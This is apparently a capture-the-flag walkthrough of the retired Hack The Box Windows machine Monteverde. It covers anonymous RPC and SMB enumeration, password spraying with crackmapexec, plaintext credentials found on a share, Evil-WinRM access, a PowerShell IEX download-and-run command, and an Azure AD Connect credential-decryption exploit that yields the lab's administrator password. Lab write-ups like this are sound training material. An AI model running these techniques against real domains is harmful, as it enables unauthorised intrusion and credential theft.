Monteverde : HTB walkthrough

Now since the machine has retired it’s time to go through the process to solve it. This was considerably easy machine if you are familiar with windows.


Nmap scan revealed the following

So we see we have active directory in this machine. Both the ports report to LDAP. Info : — — — — — — — -


I was not satisfied with this so did a fullport NMAP scan… A good habbit!!!

Took ages but was worth it. Lots of ports were open. Let’s start with enum.

RPC Enumeration

Connecting via rpcclient works using anonymous login. Rpcclient -U ‘’ -N

Let us save the users and group names to a list users.txt for password cracking attack.Also added Dimitry, Sally , Ray etc for better username list

user list

SMB Enumeration

#Smbclient -U ‘’ -L //// — — Anonymous login accepted. — — No workgroup’s available

KERBEROS Enumeration

AS_REP — — not possible , Has no “ Don’t_require_preauth” — — thus AS_REP roasting not possible


  1. Tried hydra but ended with invalid response
  2. Crackmapexec for winrm (5985 port)

root@kali:~/Downloads/htb/Monteverde#crackmapexec winrm -u ~/Downloads/htb/Monteverde/users.txt -p /pass1.txt

This did not work so I tried for the SMB .

root@kali:~/Downloads/htb/Monteverde# crackmapexec smb -u ~/Downloads/htb/Monteverde/users.txt -p pass1.txt

SABatchJobs ;;;;; bad password practices by Developer or SysAdmins

Let’s go back to SMB enumeration and login with credentials

SMB Enumeration with credentials

Username : SABatchJobs Password : SABatchJobs

SYSVOL found with some files , but GptTemp.inf on both policies contained no juicy info

Found users$ share and it contained some interesting info in azure.xml


Active directory credentials — -

Let’s try for kerberoasting and winrm login exploitation.Username : mhope Password : 4n0therD4y@n0th3r$


No entries found. Might be Windows Remote Management works… Try Evil-winrm

EVIL-WinRM — -Windows Remote Management Login

So I tried to first cross check with CrackMapExec to see if winrm is accessible using these credentials.

Great !! Shows pwn3d!. Let’s try to login with evil-winrm

Finally Got USER !!!!!!


First things first — — Tried , but seems python was not installed on the machine. So went for JAWS enumeration script.

*Evil-WinRM* PS C:\Users\mhope\Desktop> IEX(new-object net.webclient).downloadString(‘')

So you see here we share Azure Admin group with AAD_98********* user and ADMINISTRATOR. And the only service running of some interest was AZURE

  1. Azure AD Connect Exploit

“Exploit can get us plain text credentials of whatever AD account is set to use it — — ADMINISTRATOR”

Ok so we have three options

  • ADSyncDecrypt
  • ADsyncGather
  • ADSyncQuery
Out of which ADSyncDecrypt matches all our requirements
We will run our exploit from bin folder of AD Sync dir
You see there is an mcrypt.dll , so when you transfer your AdDecrypt.exe , transfer mcrypt.dll too; else this one will be used and since it has no readable access, this won’t help you crack credentials.

I got a precompiled version here. So I transferred AdDecrypt.exe and mcrypt.dll to my writable directory on target machine which was C:/Users/mhope/Desktop. And went to below location and ran command.

C:\Program Files\Microsoft Azure AD Sync\bin

*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\bin> C:\Users\mhope\Desktop\AdDecrypt.exe

There was an error in finding localDB

There was an error in finding localDB.So I tried running with FullSQL Flag. You can see the difference here, why I used FullSQL flag.

It will access the ADSync on full MSSQL rather than LocalDB instance.
This time this worked.

Username: administrator Password: d0m@in4dminyeah

Now let’s do windows Remote managament <Evil-winrm> connection using these creds.

Found The Flag.

EUREKA !!!! We got the root.

OSCP | CEH | Cyber Security Enthusiast.